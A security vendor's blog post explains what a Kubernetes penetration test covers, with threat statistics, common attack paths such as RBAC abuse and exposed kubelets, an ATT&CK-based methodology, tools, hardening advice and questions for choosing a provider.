Kubernetes Pentest in 2026: What a Real Container Security Assessment Covers
A Kubernetes pentest is not a network pentest with YAML on top. It is a different engagement — different scope, different assumptions, different attacker model — and by 2026 that difference matters more than ever.
The CNCF’s 2026 cloud-native survey reports that 82% of container users now run Kubernetes in production, up from 66% in 2023. Red Hat’s 2024 State of Kubernetes Security found that 89% of organizations had at least one container or Kubernetes security incident in the preceding twelve months, and 46% of them lost revenue or customers as a result. Wiz’s 2025 Kubernetes Security Report puts the speed of opportunistic attacks in stark terms: a newly provisioned AKS cluster sees its first attack attempt within 18 minutes; EKS within 28.
If that is the baseline, then “we scanned our images and ran kube-bench” is not a security program. This post is a buyer’s guide for CISOs and security leads: what a credible Kubernetes pentest actually covers, which attack paths you should expect to see in the report, and what separates a real assessment from a checkbox exercise.
Why Kubernetes breaks the traditional pentest mental model
A standard external network pentest asks one question: can I break in from the outside? A standard web application pentest asks: can I bypass the app’s authentication, authorisation, or business logic?
A Kubernetes pentest asks both of those and a third one that changes the entire scope:
If one pod is already lost, how far can the attacker go?
That “assume breach” framing is not optional. Kubernetes combines five risk surfaces that most other environments keep separate — shared-kernel container isolation, a massive control plane, fine-grained RBAC, flat east-west networking, and declarative infrastructure stored as code. Compromise at any one of those layers can cascade into the others. And the assets are ephemeral: pods come and go, which means evidence of an intrusion may be gone before you notice it.
So a Kubernetes pentest has to do three things a conventional engagement does not:
- Start from inside the cluster as well as outside. A pentester should be handed a low-privilege pod and asked to show what they can reach.
- Review manifests, Helm charts, and admission policies as artifacts in their own right. Your security posture is defined in YAML. That YAML is in scope.
- Map findings to an attacker’s goals, not to a scanner’s categories. The MITRE ATT&CK for Containers matrix is the right reference frame, not a generic CVSS list.
The 2026 Kubernetes threat landscape, in five numbers
Stats worth carrying into the next board meeting:
- 82% in production. Kubernetes is no longer emerging infrastructure. It is a standard target. (CNCF, January 2026)
- 89% incident rate. Nearly nine in ten organisations reported a Kubernetes-related security incident in the prior year, and 45% specifically reported runtime incidents. (Red Hat, June 2024)
- 18 minutes to first attack. That is how long new cloud clusters typically sit unbothered before the internet finds them. (Wiz, 2025)
- 40,000× the humans. Sysdig’s 2025 report found that service accounts outnumber human users by roughly four orders of magnitude and are 7.5× riskier in practice. Identity is the new perimeter, and most of that identity is non-human. (Sysdig, March 2025)
- ~5.5% critical-severity runtime plateau. The share of running images carrying critical or high vulnerabilities has roughly levelled off, while runtime automation continues to grow: 70%+ of teams now use behaviour-based detections. (Sysdig, April 2026)
The pattern is familiar: hygiene is improving, attacker tempo is not forgiving, and the weak spots have shifted from “unpatched CVEs” toward identity, configuration, and supply chain.
How a pod becomes a cluster: the attack paths that keep showing up
Every competent Kubernetes pentest eventually tells the same story, with minor variations. You start with a small foothold — a vulnerable application, a leaked token, an exposed endpoint — and you end with administrative control over the cluster, the workloads, and usually the underlying cloud account too. Here are the rungs of that ladder.
1. Overly permissive RBAC
This is the single most common finding. Teams ship a workload with cluster-admin, a wildcard verb, or access to serviceaccounts/token, and quietly forget about it. Kubernetes’ own RBAC good practices explicitly call out the verbs that matter — bind, escalate, impersonate, and node proxy — because each one can be turned into a privilege escalation primitive. Node proxy access is particularly under-appreciated: it effectively grants access to the kubelet API and can bypass both admission control and audit logging.
2. Exposed kubelet on port 10250
If a pentester can reach the kubelet API with anonymous authentication still enabled, the game is often already over. They can enumerate pods, exec into them, and pivot across the node. The Kubernetes kubelet authn/authz docs and the OWASP Kubernetes Top 10 both flag anonymous kubelet access as a critical misconfiguration; we still find it, especially on older on-premises clusters.
3. Exposed or unauthenticated etcd
Etcd on port 2379 without mutual TLS is the nuclear option. Etcd holds the entire cluster state; reading it bypasses Kubernetes RBAC entirely. And by default, Secrets are stored in etcd as plaintext unless encryption-at-rest has been explicitly configured. A successful etcd dump usually ends the engagement immediately.
4. Service account token abuse
By default, Kubernetes mounts a projected service account token into every pod. If the application has no reason to talk to the API server, that token is pure attacker fuel. The service account documentation and the application security checklist both recommend setting automountServiceAccountToken: false wherever possible. It almost never is.
5. Privileged pods, hostPath, hostPID, hostNetwork
These settings collapse the isolation boundary between container and host. A privileged pod with a hostPath mount of / is, for practical purposes, the node. The Pod Security Standards forbid these in the restricted profile; baseline profile still permits some of them. In pentests, we frequently find “temporary” DaemonSets with host-level access that have been running for years.
6. Container escape via runtime bugs
Most of the time, pentesters do not need a container escape — one is usually handed to them by the configuration. But when runtime bugs do land, they are severe. CVE-2024-21626, “Leaky Vessels,” in runc allowed host filesystem access via leaked file descriptors and working-directory tricks. CVE-2024-10220 turned the legacy gitRepo volume into arbitrary command execution on the node for any user who could create pods. Both reinforce that runtime patching belongs in your pentest scope conversation, not just your ops team’s backlog.
7. The 2025 ingress-nginx disclosure (“IngressNightmare”)
If you only remember one Kubernetes CVE from the last two years, make it this one. CVE-2025-1974, disclosed by the Kubernetes Security Response Committee on 24 March 2025, allowed unauthenticated remote code execution in the widely deployed ingress-nginx controller. Because ingress-nginx is typically granted broad Secret access, exploitation often leads to cluster-wide Secret disclosure and, in the SRC’s own words, gives anyone on the pod network a “good chance” of taking over the cluster with no credentials at all. Wiz estimated that a substantial fraction of internet-reachable clusters were exposed at disclosure time. If your pentest report does not mention how your environment fared against IngressNightmare, ask why.
8. Supply chain: unsigned images, opaque dependencies
The OWASP Kubernetes Top 10 supply-chain entry is the short version of a long conversation. Unsigned base images, untrusted registries, hidden layers, and CI/CD pipelines with write access to production clusters all turn one compromised developer workstation into cluster-wide risk. A real pentest inspects this part of the stack, not just the running pods.
The methodology: mapping a Kubernetes pentest to MITRE ATT&CK for Containers
The cleanest way to structure a Kubernetes engagement — and the cleanest report format — is to follow the ATT&CK for Containers matrix. Microsoft’s updated threat matrix for Kubernetes is a useful companion view.
Reconnaissance and discovery. External recon covers the API server, ingress, exposed dashboards, kubelets, and registries. Internal recon — which only happens in an assume-breach test — enumerates the compromised pod’s service-account permissions, mounted secrets, reachable internal services, cloud metadata endpoints, and neighbouring workloads.
Initial access. Public-facing application exploitation, weak or missing ingress authentication, a compromised image pulled from CI/CD, or stolen cloud credentials that grant kubeconfig access. The exposed Kubernetes Dashboard is still a live issue in internal-facing clusters more often than vendors would like to admit.
Privilege escalation. This is the most differentiated part of a Kubernetes pentest, and where commodity scanners are weakest. The pentester looks for paths from a low-privilege service account to cluster-admin, chaining RBAC verbs, node proxy access, workload creation with more-privileged service accounts, privileged container escape to the node, and token harvesting from the node’s filesystem.
Lateral movement. Kubernetes networking is flat by default — every pod can talk to every other pod unless a NetworkPolicy says otherwise. The test maps pod-to-pod reachability, namespace crossings, access to internal management planes, service meshes, and crossover into the cloud provider’s IAM via workload identity.
Persistence. Kubernetes persistence is declarative. Instead of dropping a binary, an attacker creates a CronJob, a DaemonSet, a mutating webhook, a sidecar, or simply edits a GitOps manifest upstream. For defenders, this is why “just kill the pod” is rarely the right incident response step.
Defense evasion, credential access, exfiltration. Audit visibility gaps on kubelet and node proxy paths, service account and cloud credential theft, Secret enumeration, and data egress via internal services or object storage.
The tools a credible pentest uses
Tooling alone does not make a pentest. But a credible report will reference most of the following, in context:
- kube-hunter for initial discovery of exposed Kubernetes components, from outside or from a near-cluster vantage point.
- kube-bench to measure the cluster against the CIS Kubernetes Benchmark. A good baseline, not a substitute for testing.
- kubescape for manifest, cluster, and policy misconfiguration review.
- Peirates as a post-exploitation toolkit once a pod foothold exists — enumerating service account privileges, hunting cloud metadata, and abusing what it finds.
- Trivy for image, filesystem, SBOM, and IaC scanning to cover the supply-chain side of scope.
- KubiScan for fast RBAC privilege-escalation enumeration.
- Prowler and Checkov on the posture side, and Falco as a reference point for what runtime detection should look like.
The deliverable you care about is not the tool output. It is the chain: which finding, combined with which misconfiguration, gets the attacker from point A to cluster-admin — and the evidence to reproduce it.
What good hardening looks like
If your pentest uncovers most of the attack paths above, the remediation plan should look similar across organisations. The authoritative references are NIST SP 800-190, the NSA/CISA Kubernetes Hardening Guidance v1.2, and the CIS Kubernetes Benchmark.
Practically, that means:
- Enforce admission control. Pod Security Admission for the baseline, Kyverno or OPA Gatekeeper for anything more expressive. OWASP’s 2025 Top 10 explicitly flags lack of cluster-level policy enforcement as a top risk.
- Default-deny NetworkPolicies in every namespace, with Cilium or Calico doing the heavy lifting. Flat networks are the friend of the attacker.
- Sign images, track SBOMs. Sigstore/cosign has moved from “nice to have” to table stakes; Kubernetes itself now ships signed release artifacts.
- Encrypt etcd at rest, reduce secret sprawl. Use external secret backends where you can, and avoid plain environment variables as a Secret delivery mechanism.
- Shrink the identity blast radius. Disable token automount where unused, use short-lived bound tokens, strip wildcard privileges from RBAC, and keep powerful service accounts off internet-exposed workloads.
- Invest in runtime detection. Scanning catches pre-deployment problems. Falco, Tetragon, and their peers catch the things that only show up after an attacker is already inside.
How a Kubernetes pentest differs from a web or network pentest
A few specific differences worth communicating to a procurement team:
- Assume-breach is the default. Expect the statement of work to include a starting low-privilege pod, not only an external IP range.
- Manifests are in scope. Helm charts, Kustomize overlays, and admission policies are the security architecture. A pentest that ignores them is incomplete.
- East-west matters more than north-south. The interesting findings are usually lateral, not perimeter.
- Cloud boundary crosses are expected. Kubernetes IAM, AWS/Azure/GCP IAM, and service account token binding are all in play. A good engagement follows the attacker wherever the privileges lead.
- Time-boxed plus context-gathered. The tester needs enough time to understand your specific platform before exploiting it. A one-week “Kubernetes pentest” on a complex production cluster is almost always too short.
Frequently asked questions
What is a Kubernetes pentest? A targeted security assessment of a Kubernetes cluster that combines external and assume-breach testing, RBAC and manifest review, and attack-path analysis from a compromised pod to cluster or cloud takeover — mapped to MITRE ATT&CK for Containers and reported with reproducible evidence.
How often should we run one? Annually at minimum for any production cluster, and after any major architectural change — new service mesh, migration between cloud providers, introduction of GitOps or admission policy, or adoption of a new ingress controller. Post-IngressNightmare, many regulated clients have moved to twice-yearly.
Can a compromised pod really take over the whole cluster? Yes, and the path is usually short. In real engagements we routinely go from a single compromised pod to cluster-admin in hours, through RBAC abuse, service account token misuse, or a privileged-pod escape followed by node credential harvesting.
How is a Kubernetes pentest different from a cloud pentest? A cloud pentest focuses on the cloud provider’s IAM, services, and configurations; a Kubernetes pentest focuses on the cluster, its control plane, its workloads, and its RBAC. The two overlap at workload identity — and the best engagements cover both sides of that boundary, rather than stopping at the kubeconfig.
Where to go next
If you are evaluating a Kubernetes security assessment right now, the most useful questions to ask a prospective provider are:
- Will you start from outside only, or from inside the cluster as well?
- Are manifests, Helm charts, and admission policies in the scope of the review?
- How do you structure findings — CVSS scores or attack-path narratives mapped to MITRE ATT&CK for Containers?
- What does retesting look like, and is it included?
- Who on your team has run Kubernetes pentests before, and against clusters of what size and complexity?
At BSG, our penetration testing practice includes dedicated Kubernetes and cloud-native engagements, and we regularly combine them with application security assessments of the workloads running inside the cluster. If you want a scoping conversation — not a sales pitch — get in touch for a quote and we will tell you honestly whether a Kubernetes pentest is the right next investment for your environment, or whether you would get more value from something else first.